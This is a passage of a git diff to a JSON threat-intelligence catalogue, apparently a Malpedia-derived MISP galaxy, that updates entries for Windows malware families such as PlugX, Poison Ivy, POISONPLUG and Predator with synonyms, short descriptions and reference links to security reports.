"https://www.metabaseq.com/recursos/ploutus-is-back-targeting-itautec-atms-in-latin-america", + "https://blog.talosintelligence.com/2019/05/10-years-of-virtual-dynamite.html" ], "synonyms": [], "type": [] @@ -13248,32 +24167,114 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.plugx", - "https://threatrecon.nshc.net/2019/03/19/sectorm04-targeting-singapore-custom-malware-analysis/", - "http://blog.jpcert.or.jp/2015/01/analysis-of-a-r-ff05.html", - "http://blog.jpcert.or.jp/.s/2017/04/redleaves---malware-based-on-open-source-rat.html", - "https://countuponsecurity.com/2018/02/04/malware-analysis-plugx/", - "https://circl.lu/assets/files/tr-12/tr-12-circl-plugx-analysis-v1.pdf", - "https://www.rsa.com/content/dam/pdfs/2-2017/kingslayer-a-supply-chain-attack.pdf", - "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", - "http://blog.airbuscybersecurity.com/post/2014/01/plugx-some-uncovered-points.html", + "https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/operation-drbcontrol-uncovering-a-cyberespionage-campaign-targeting-gambling-companies-in-southeast-asia", + "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf", "https://community.rsa.com/thread/185439", - "https://researchcenter.paloaltonetworks.com/2017/06/unit42-paranoid-plugx/", - "https://www.lac.co.jp/lacwatch/people/20171218_001445.html", - "https://countuponsecurity.com/2018/05/09/malware-analysis-plugx-part-2/", - "https://securelist.com/time-of-death-connected-medicine/84315/", - "https://www.arbornetworks.com/blog/asert/wp-content/uploads/2016/01/ASERT-Threat-Intelligence-Brief-2015-08-Uncovering-the-Seven-Point-Dagger.pdf", - "https://blog.malwarebytes.com/threat-analysis/2016/08/unpacking-the-spyware-disguised-as-antivirus/", + "https://raw.githubusercontent.com/yt0ng/cracking_softcell/main/Cracking_SOFTCLL_TLP_WHITE.pdf", + "https://speakerdeck.com/ashley920/into-the-fog-the-return-of-icefog-apt", + "https://news.sophos.com/en-us/2020/11/04/a-new-apt-uses-dll-side-loads-to-killlsomeone/", + "https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/", + "https://threatconnect.com/blog/research-roundup-activity-on-previously-identified-apt33-domains/", + "https://www.rsa.com/content/dam/pdfs/2-2017/kingslayer-a-supply-chain-attack.pdf", + "https://app.box.com/s/z1uanuv1vn3vw5iket1r6bqrmlra0gpn", + "https://www.virusbulletin.com/virusbulletin/2020/05/vb2019-paper-apt-cases-exploiting-vulnerabilities-regionspecific-software/", + "https://www.fireeye.com/blog/threat-research/2014/06/clandestine-fox-part-deux.html", + "https://blog.viettelcybersecurity.com/p1-chien-dich-cua-nhom-apt-trung-quoc-goblin-panda-tan-cong-vao-viet-nam-loi-dung-dai-dich-covid-19/", + "https://www.secureworks.com/research/threat-profiles/bronze-firestone", + "https://www.trendmicro.com/en_us/research/20/k/weaponizing-open-source-software-for-targeted-attacks.html", + "https://blog.vincss.net/2020/03/re012-phan-tich-ma-doc-loi-dung-dich-COVID-19-de-phat-tan-gia-mao-chi-thi-cua-thu-tuong-Nguyen-Xuan-Phuc-phan2.html", "http://blog.jpcert.or.jp/2017/02/plugx-poison-iv-919a.html", - "https://www.sophos.com/en-us/medialibrary/pdfs/technical%20papers/plugx-thenextgeneration.pdf" + "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", + "https://www.secureworks.com/research/threat-profiles/bronze-olive", + "https://go.recordedfuture.com/hubfs/reports/cta-2020-0915.pdf", + "https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia/", + "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/", + "http://blog.jpcert.or.jp/2015/01/analysis-of-a-r-ff05.html", + "https://insights.oem.avira.com/new-wave-of-plugx-targets-hong-kong/", + "https://www.virusbulletin.com/virusbulletin/2020/03/vb2019-paper-pulling-pkplug-adversary-playbook-long-standing-espionage-activity-chinese-nation-state-adversary/", + "https://securelist.com/apt-trends-report-q2-2020/97937/", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", + "https://pylos.co/wp-content/uploads/2020/02/Threat-Intelligence-and-the-Limits-of-Malware-Analysis.pdf", + "https://www.secureworks.com/research/bronze-president-targets-ngos", + "https://countuponsecurity.com/2018/02/04/malware-analysis-plugx/", + "https://www.trendmicro.com/en_us/research/21/a/xdr-investigation-uncovers-plugx-unique-technique-in-apt-attack.html", + "https://www.ptsecurity.com/ww-en/analytics/calypso-apt-2019/", + "http://blog.airbuscybersecurity.com/post/2014/01/plugx-some-uncovered-points.html", + "https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape", + "https://www.zdnet.com/article/chinese-state-hackers-target-hong-kong-catholic-church/", + "https://st.drweb.com/static/new-www/news/2020/july/Study_of_the_APT_attacks_on_state_institutions_in_Kazakhstan_and_Kyrgyzstan_en.pdf", + "https://adeo.com.tr/wp-content/uploads/2020/02/APT10_Report.pdf", + "https://threatrecon.nshc.net/2019/03/19/sectorm04-targeting-singapore-custom-malware-analysis/", + "https://blog.ensilo.com/uncovering-new-activity-by-apt10", + "http://www.talent-jump.com/article/2020/02/17/CLAMBLING-A-New-Backdoor-Base-On-Dropbox-en/", + "https://www.secureworks.com/research/threat-profiles/bronze-riverside", + "https://circl.lu/assets/files/tr-12/tr-12-circl-plugx-analysis-v1.pdf", + "https://www.welivesecurity.com/2020/12/10/luckymouse-ta428-compromise-able-desktop/", + "https://blog.malwarebytes.com/threat-analysis/2016/08/unpacking-the-spyware-disguised-as-antivirus/", + "https://silascutler.blogspot.com/2019/11/fresh-plugx-october-2019.html", + "https://st.drweb.com/static/new-www/news/2020/october/Study_of_the_ShadowPad_APT_backdoor_and_its_relation_to_PlugX_en.pdf", + "https://researchcenter.paloaltonetworks.com/2017/06/unit42-paranoid-plugx/", + "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", + "https://www.macnica.net/file/security_report_20160613.pdf", + "https://securelist.com/time-of-death-connected-medicine/84315/", + "https://www.bleepingcomputer.com/news/security/chinas-apt-hackers-move-to-ransomware-attacks/", + "https://www.secureworks.com/research/threat-profiles/bronze-express", + "https://www.secureworks.com/research/threat-profiles/bronze-woodland", + "https://www.sophos.com/en-us/medialibrary/pdfs/technical%20papers/plugx-thenextgeneration.pdf", + "https://securelist.com/apt-trends-report-q3-2020/99204/", + "https://www.fortinet.com/blog/threat-research/uncovering-new-activity-by-apt-", + "https://www.lac.co.jp/lacwatch/people/20171218_001445.html", + "http://blog.jpcert.or.jp/.s/2017/04/redleaves---malware-based-on-open-source-rat.html", + "https://www.contextis.com/de/blog/avivore", + "https://www.us-cert.gov/ncas/alerts/TA17-117A", + "https://www.nttsecurity.com/docs/librariesprovider3/default-document-library/craftypanda-analysis-report", + "https://www.secureworks.com/research/threat-profiles/bronze-union", + "https://twitter.com/stvemillertime/status/1261263000960450562", + "https://unit42.paloaltonetworks.com/pkplug_chinese_cyber_espionage_group_attacking_asia/", + "https://lab52.io/blog/the-energy-reserves-in-the-eastern-mediterranean-sea-and-a-malicious-campaign-of-apt10-against-turkey/", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/apt41-indictments-china-espionage", + "https://go.recordedfuture.com/hubfs/reports/cta-2020-0728.pdf", + "https://risky.biz/whatiswinnti/", + "https://lab52.io/blog/mustang-panda-recent-activity-dll-sideloading-trojans-with-temporal-c2-servers/", + "https://blogs.jpcert.or.jp/en/2017/04/redleaves---malware-based-on-open-source-rat.html", + "https://www.cyber.gov.au/sites/default/files/2019-03/msp_investigation_report.pdf", + "https://www.proofpoint.com/us/blog/threat-insight/ta416-goes-ground-and-returns-golang-plugx-malware-loader", + "https://securelist.com/cycldek-bridging-the-air-gap/97157/", + "https://countuponsecurity.com/2018/05/09/malware-analysis-plugx-part-2/", + "https://www.secureworks.com/research/threat-profiles/bronze-keystone", + "https://www.secureworks.com/research/threat-profiles/bronze-overbrook", + "https://www.secureworks.com/research/threat-profiles/bronze-atlas", + "https://go.recordedfuture.com/hubfs/reports/cta-2021-0228.pdf", + "https://marcoramilli.com/2020/03/19/is-apt27-abusing-covid-19-to-attack-people/", + "https://www.secureworks.com/research/threat-profiles/bronze-president" ], "synonyms": [ - "Korplug" + "Destroy RAT", + "Kaba", + "Korplug", + "Sogu", + "TIGERPLUG" ], "type": [] }, "uuid": "036bd099-fe80-46c2-9c4c-e5c6df8dcdee", "value": "PlugX" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.plurox", + "https://securelist.com/plurox-modular-backdoor/91213/", + "https://sysopfb.github.io/malware,/crypters/2019/09/23/Plurox-packer-layer-unpacked.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "6c8b94fc-f2d4-4347-aa49-4e6daac74314", + "value": "Plurox" + }, { "description": "", "meta": { @@ -13287,23 +24288,85 @@ "uuid": "fb4313ea-1fb6-4766-8b5c-b41fd347e4c5", "value": "pngdowner" }, + { + "description": "uses POCO C++ cross-platform library, Xor-based string obfuscation, SSL library code and string overlap with Xtunnel, infrastructure overlap with X-Agent, probably in use since mid-2018", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.pocodown", + "https://threatvector.cylance.com/en_us/home/inside-the-apt28-dll-backdoor-blitz.html", + "https://twitter.com/cyb3rops/status/1129653190444703744", + "https://threatvector.cylance.com/en_us/home/flirting-with-ida-and-apt28.html" + ], + "synonyms": [ + "Blitz", + "PocoDownloader" + ], + "type": [] + }, + "uuid": "25804d6d-447f-4933-9ba0-876f9d054b68", + "value": "PocoDown" + }, + { + "description": "According to FireEye, POISONPLUG is a highly obfuscated modular backdoor with plug-in capabilities. The malware is capable of registry or service persistence, self-removal, plug-in execution, and network connection forwarding. POISONPLUG has been observed using social platforms to host encoded C&C commands.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.poisonplug", + "https://content.fireeye.com/apt-41/rpt-apt41/", + "https://securelist.com/apt-trends-report-q3-2020/99204/", + "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko", + "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf", + "https://www.fireeye.com/blog/threat-research/2019/10/lowkey-hunting-for-the-missing-volume-serial-id.html", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/apt41-indictments-china-espionage" + ], + "synonyms": [ + "Barlaiy" + ], + "type": [] + }, + "uuid": "3b1c7856-5158-418c-90ad-afda67a66963", + "value": "poisonplug" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.poison_ivy", - "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2017/august/analysing-a-recent-poison-ivy-sample/", "https://researchcenter.paloaltonetworks.com/2016/04/unit42-new-poison-ivy-rat-variant-targets-hong-kong-pro-democracy-activists/", + "https://raw.githubusercontent.com/yt0ng/cracking_softcell/main/Cracking_SOFTCLL_TLP_WHITE.pdf", "http://blog.fortinet.com/2017/08/23/deep-analysis-of-new-poison-ivy-variant", - "https://www.fireeye.com/blog/threat-research/2013/08/operation-molerats-middle-east-cyber-attacks-using-poison-ivy.html", + "https://research.checkpoint.com/2020/vicious-panda-the-covid-campaign/", + "https://github.com/CyberMonitor/APT_CyberCriminal_Campagin_Collections/blob/master/2016/2016.04.26.New_Poison_Ivy_Activity_Targeting_Myanmar_Asian_Countries/New%20Poison%20Ivy%20Activity%20Targeting%20Myanmar%2C%20Asian%20Countries.pdf", + "https://www.virusbulletin.com/virusbulletin/2020/03/vb2019-paper-pulling-pkplug-adversary-playbook-long-standing-espionage-activity-chinese-nation-state-adversary/", + "https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html", + "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2017/august/analysing-a-recent-poison-ivy-sample/", + "https://lab52.io/blog/icefog-apt-group-abusing-recent-conflict-between-iran-and-eeuu/", "https://www.fireeye.com/blog/threat-research/2013/10/know-your-enemy-tracking-a-rapidly-evolving-apt-actor.html", + "https://www.proofpoint.com/us/threat-insight/post/chinese-apt-operation-lagtime-it-targets-government-information-technology", + "https://www.virusbulletin.com/uploads/pdf/conference_slides/2019/VB2019-GuPan.pdf", + "https://researchcenter.paloaltonetworks.com/2016/11/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/", + "https://www.youtube.com/watch?v=1WfPlgtfWnQ", + "https://www.secureworks.com/research/threat-profiles/aluminum-saratoga", + "https://www.slideshare.net/StefanoMaccaglia/bsides-ir-in-heterogeneous-environment", + "https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers", + "https://vblocalhost.com/uploads/VB2020-20.pdf", + "https://community.riskiq.com/article/56fa1b2f", + "https://www.secureworks.com/research/threat-profiles/bronze-keystone", + "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf", "https://blog.fortinet.com/2017/09/15/deep-analysis-of-new-poison-ivy-plugx-variant-part-ii", "https://researchcenter.paloaltonetworks.com/2014/09/recent-watering-hole-attacks-attributed-apt-group-th3bug-using-poison-ivy/", - "http://blogs.360.cn/post/APT_C_01_en.html", - "https://github.com/CyberMonitor/APT_CyberCriminal_Campagin_Collections/blob/master/2016/2016.04.26.New_Poison_Ivy_Activity_Targeting_Myanmar_Asian_Countries/New%20Poison%20Ivy%20Activity%20Targeting%20Myanmar%2C%20Asian%20Countries.pdf", - "https://researchcenter.paloaltonetworks.com/2016/11/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/" + "https://www.welivesecurity.com/2021/02/01/operation-nightscout-supply-chain-attack-online-gaming-asia/", + "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2011/the_nitro_attacks.pdf", + "https://vblocalhost.com/uploads/VB2020-Ozawa-etal.pdf", + "https://us-cert.cisa.gov/ncas/alerts/aa20-275a", + "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf", + "https://www.secureworks.com/research/threat-profiles/bronze-union", + "https://www.fireeye.com/blog/threat-research/2013/08/operation-molerats-middle-east-cyber-attacks-using-poison-ivy.html", + "https://www.secureworks.com/research/threat-profiles/bronze-firestone", + "https://www.secureworks.com/research/threat-profiles/bronze-riverside", + "http://blogs.360.cn/post/APT_C_01_en.html" ], "synonyms": [ + "SPIVY", "pivy", "poisonivy" ], @@ -13312,6 +24375,53 @@ "uuid": "7789fc1b-3cbc-4a1c-8ef0-8b06760f93e7", "value": "Poison Ivy" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.poison_rat", + "https://blog.trendmicro.com/trendlabs-security-intelligence/kivars-with-venom-targeted-attacks-upgrade-with-64-bit-support/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "69605d66-d77e-4e7b-8c64-381e2cd97c14", + "value": "Poison RAT" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.poldat", + "http://fireeyeday.com/1604/pdf/KeyNote_2.pdf", + "https://youtu.be/DDA2uSxjVWY?t=344", + "https://www.cylance.com/content/dam/cylance/pdfs/reports/Op_Dust_Storm_Report.pdf" + ], + "synonyms": [ + "KABOB", + "Zlib" + ], + "type": [] + }, + "uuid": "d30d5a0c-cbfb-49c3-99e7-1d6d1888fc2d", + "value": "Poldat" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.polyglotduke", + "https://www.carbonblack.com/2020/03/26/the-dukes-of-moscow/", + "https://www.welivesecurity.com/2019/10/17/operation-ghost-dukes-never-left/", + "https://www.secureworks.com/research/threat-profiles/iron-hemlock", + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "53371de9-291a-4d33-9fd2-058b43dddd5d", + "value": "PolyglotDuke" + }, { "description": "", "meta": { @@ -13330,8 +24440,18 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pony", - "https://www.mcafee.com/us/resources/reports/rp-quarterly-threats-jun-2017.pdf", + "http://www.secureworks.com/research/threat-profiles/gold-essex", + "https://www.youtube.com/watch?v=EyDiIAt__dI", + "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/", "https://www.uperesia.com/analysis-of-a-packed-pony-downloader", + "https://www.secureworks.com/research/threat-profiles/gold-evergreen", + "https://research.checkpoint.com/2019/select-code_execution-from-using-sqlite/", + "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf", + "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", + "https://int0xcc.svbtle.com/practical-threat-hunting-and-incidence-response-a-case-of-a-pony-malware-infection", + "https://www.secureworks.com/research/threat-profiles/gold-galleon", + "https://www.mcafee.com/us/resources/reports/rp-quarterly-threats-jun-2017.pdf", + "https://www.secureworks.com/research/threat-profiles/gold-essex", "https://github.com/nyx0/Pony" ], "synonyms": [ @@ -13361,8 +24481,23 @@ "description": "", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.popcorn_time", - "https://twitter.com/malwrhunterteam/status/806595092177965058" + "https://malpedia.caad.fkie.fraunhofer.de/details/win.poorweb", + "https://securelist.com/apt-trends-report-q2-2018/86487/", + "https://fortiguard.com/resources/threat-brief/2019/05/10/fortiguard-threat-intelligence-brief-may-10-2019", + "https://asec.ahnlab.com/ko/18796/", + "https://blog.reversinglabs.com/blog/poorweb-exploiting-document-formats" + ], + "synonyms": [], + "type": [] + }, + "uuid": "e166950b-2d0d-41e1-aee6-ccf0895ce9a5", + "value": "PoorWeb" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.popcorn_time" ], "synonyms": [], "type": [] @@ -13401,7 +24536,17 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.poshc2", - "https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html" + "https://www.secureworks.com/research/threat-profiles/cobalt-trinity", + "https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html", + "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_0_JPCERT_en.pdf", + "https://paper.seebug.org/1301/", + "https://github.com/jeFF0Falltrades/IoCs/blob/master/APT/poshc2_apt_33.md", + "https://labs.nettitude.com/blog/detecting-poshc2-indicators-of-compromise/", + "https://github.com/nettitude/PoshC2_Python/", + "https://redcanary.com/blog/getsystem-offsec/", + "https://go.recordedfuture.com/hubfs/reports/cta-2021-0107.pdf", + "http://www.rewterz.com/rewterz-news/rewterz-threat-alert-iranian-apt-uses-job-scams-to-lure-targets", + "https://www.fireeye.com/blog/threat-research/2020/07/scandalous-external-detection-using-network-scan-data-and-automation.html" ], "synonyms": [], "type": [] @@ -13413,20 +24558,83 @@ "description": "", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.poweliks_dropper", - "https://www.zscaler.com/blogs/research/malvertising-targeting-european-transit-users" + "https://malpedia.caad.fkie.fraunhofer.de/details/win.poslurp", + "https://atr-blog.gigamon.com/2019/07/23/abadbabe-8badf00d-discovering-badhatch-and-a-detailed-look-at-fin8s-tooling/", + "https://norfolkinfosec.com/fuel-pumps-ii-poslurp-b/", + "https://twitter.com/just_windex/status/1162118585805758464" + ], + "synonyms": [ + "PUNCHTRACK" + ], + "type": [] + }, + "uuid": "15305d8b-55ff-47b2-b1c7-550a8a36ce36", + "value": "PoSlurp" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.poulight_stealer", + "https://www.carbonblack.com/blog/tau-threat-discovery-cryptocurrency-clipper-malware-evolves/", + "https://twitter.com/MBThreatIntel/status/1240389621638402049?s=20" + ], + "synonyms": [ + "Poullight" + ], + "type": [] + }, + "uuid": "e4bcb3e4-17f6-4786-a19b-255c48a07f9a", + "value": "Poulight Stealer" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.poweliks", + "https://www.zscaler.com/blogs/research/malvertising-targeting-european-transit-users", + "https://www.gdatasoftware.com/blog/2014/07/23947-poweliks-the-persistent-malware-without-a-file", + "https://thisissecurity.stormshield.com/2014/08/20/poweliks-command-line-confusion/" ], "synonyms": [], "type": [] }, "uuid": "782bee33-9f8d-41df-a608-c014bd6a7de1", - "value": "Poweliks Dropper" + "value": "Poweliks" + }, + { + "description": ".NET variant of ps1.powerton.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.powerband", + "https://blog.telsy.com/meeting-powerband-the-apt33-net-powerton-variant/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "ab603f29-9c10-4fb0-9fa3-e123fad11a31", + "value": "POWERBAND" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.powercat", + "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/", + "https://twitter.com/VK_Intel/status/1141540229951709184" + ], + "synonyms": [], + "type": [] + }, + "uuid": "f19e4583-e14d-41b7-9b7a-2bd7eeffd4b1", + "value": "PowerCat" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.powerduke", + "https://www.carbonblack.com/2020/03/26/the-dukes-of-moscow/", "https://www.volexity.com/blog/2016/11/09/powerduke-post-election-spear-phishing-campaigns-targeting-think-tanks-and-ngos/" ], "synonyms": [], @@ -13448,6 +24656,19 @@ "uuid": "9e3aaf82-268b-47d1-b953-3799c5e1f475", "value": "powerkatz" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.powerloader", + "https://www.malwaretech.com/2013/08/powerloader-injection-something-truly.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "de96ba83-27ec-434c-b77f-7a06820b6e78", + "value": "PowerLoader" + }, { "description": "", "meta": { @@ -13461,32 +24682,55 @@ "uuid": "02e5196e-f7ac-490a-9a92-d4865740016b", "value": "PowerPool" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.powershellrunner", + "https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/", + "https://raw.githubusercontent.com/k-vitali/Malware-Misc-RE/master/2019-04-13-Possible-Turla-PowerShell-Implant.ps1" + ], + "synonyms": [], + "type": [] + }, + "uuid": "1e2dfce6-1e38-4cff-a78e-b43a442ae8e6", + "value": "PowerShellRunner" + }, { "description": "A malware of the gozi group, developed on the base of isfb. It uses Office Macros and PowerShell in documents distributed in e-mail messages.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.powersniff", + "https://atr-blog.gigamon.com/2019/07/23/abadbabe-8badf00d-discovering-badhatch-and-a-detailed-look-at-fin8s-tooling/", "https://lokalhost.pl/gozi_tree.txt", - "https://www.thesecuritybuddy.com/malware-prevention/what-is-powersniff-malware/", - "https://unit42.paloaltonetworks.com/powersniff-malware-used-in-macro-based-attacks/" + "https://unit42.paloaltonetworks.com/powersniff-malware-used-in-macro-based-attacks/", + "https://content.fireeye.com/m-trends/rpt-m-trends-2017", + "https://afyonluoglu.org/PublicWebFiles/Reports-TR/2017%20FireEye%20M-Trends%20Report.pdf" + ], + "synonyms": [ + "PUNCHBUGGY" ], - "synonyms": [], "type": [] }, "uuid": "519d07f5-bea3-4360-8aa5-f9fcdb79cb52", "value": "Powersniff" }, { - "description": "", + "description": "QUICKRIDE.POWER is a PowerShell variant of the QUICKRIDE backdoor. Its payloads are often saved to C:\\windows\\temp\\", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.power_ratankba", - "https://www.riskiq.com/blog/labs/lazarus-group-cryptocurrency/", + "https://content.fireeye.com/apt/rpt-apt38", "https://blog.trendmicro.com/trendlabs-security-intelligence/lazarus-campaign-targeting-cryptocurrencies-reveals-remote-controller-tool-evolved-ratankba/", - "https://www.flashpoint-intel.com/blog/disclosure-chilean-redbanc-intrusion-lazarus-ties/", - "https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug.pdf" + "https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug.pdf", + "https://www.riskiq.com/blog/labs/lazarus-group-cryptocurrency/", + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", + "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf", + "https://www.flashpoint-intel.com/blog/disclosure-chilean-redbanc-intrusion-lazarus-ties/" + ], + "synonyms": [ + "QUICKRIDE.POWER" ], - "synonyms": [], "type": [] }, "uuid": "606f778a-8b99-4880-8da8-b923651d627b", @@ -13506,12 +24750,20 @@ "value": "prb_backdoor" }, { - "description": "", + "description": "Predator is a feature-rich information stealer. It is sold on hacking forums as a bundle which includes: Payload builder and Command and Control web panel. It is able to grab passwords from browsers, replace cryptocurrency wallets, and take photos from the web-camera. It is developed by using a modular approach so that criminals may add more sophisticated tools on top of the it.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.predator", + "https://www.fortinet.com/blog/threat-research/predator-the-thief-new-routes-delivery.html", + "https://fumik0.com/2019/12/25/lets-play-again-with-predator-the-thief/", + "https://www.bleepingcomputer.com/news/security/fake-microsoft-teams-updates-lead-to-cobalt-strike-deployment/", + "https://fumik0.com/2018/10/15/predator-the-thief-in-depth-analysis-v2-3-5/", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", "https://securelist.com/a-predatory-tale/89779", - "https://fumik0.com/2018/10/15/predator-the-thief-in-depth-analysis-v2-3-5/" + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf", + "https://www.secureworks.com/research/threat-profiles/gold-galleon", + "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_4_ogawa-niseki_en.pdf", + "https://www.cybereason.com/blog/the-hole-in-the-bucket-attackers-abuse-bitbucket-to-deliver-an-arsenal-of-malware" ], "synonyms": [], "type": [] @@ -13530,7 +24782,7 @@ "type": [] }, "uuid": "00764634-4a21-4c5c-8b1f-fb294c9bdd3f", - "value": "Prikorma" + "value": "Prikormka" }, { "description": "", @@ -13561,12 +24813,54 @@ "uuid": "0714a7ad-45cb-44ec-92f9-2e839fd8a6b8", "value": "PrincessLocker" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.project_hook", + "https://threatpost.com/dexter-project-hook-pos-malware-campaigns-persist/104655/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "d0c7815d-6039-436f-96ef-0767aabbdb36", + "value": "Project Hook POS" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.proteus", + "https://www.fortinet.com/blog/threat-research/a-new-all-in-one-botnet-proteus.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "6d5724c6-646f-498a-b810-a6cee20f2b3c", + "value": "proteus" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.protonbot", + "https://fumik0.com/2019/05/24/overview-of-proton-bot-another-loader-in-the-wild/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "03f30d04-4568-4c4c-88d6-b62efc72f33a", + "value": "ProtonBot" + }, { "description": "According to Matthew Mesa, this is a modular bot. The name stems from the string PsiXMainModule in binaries until mid of September 2018.\r\n\r\nIn binaries, apart from BotModule and MainModule, references to the following Modules have be observed:\r\nBrowserModule\r\nBTCModule\r\nComplexModule\r\nKeyLoggerModule\r\nOutlookModule\r\nProcessModule\r\nRansomwareModule\r\nSkypeModule", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.psix", + "https://www.proofpoint.com/us/threat-insight/post/psixbot-now-using-google-dns-over-https-and-possible-new-sexploitation-module", "https://blog.fox-it.com/2019/03/27/psixbot-the-evolution-of-a-modular-net-bot/", + "https://twitter.com/seckle_ch/status/1169558035649433600", + "https://www.proofpoint.com/us/threat-insight/post/psixbot-continues-evolve-updated-dns-infrastructure", "https://twitter.com/mesa_matt/status/1035211747957923840" ], "synonyms": [], @@ -13575,6 +24869,22 @@ "uuid": "416ae41e-17b2-46f6-847b-2831a0b3f8e9", "value": "PsiX" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.pslogger", + "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-239a", + "https://norfolkinfosec.com/a-lazarus-keylogger-pslogger/" + ], + "synonyms": [ + "ECCENTRICBANDWAGON" + ], + "type": [] + }, + "uuid": "1b1d3548-08db-4dff-878f-77d2f0b69777", + "value": "PSLogger" + }, { "description": "Citizenlab notes that PC Surveillance System (PSS) is a commercial spyware product offered by Cyberbit and marketed to intelligence and law enforcement 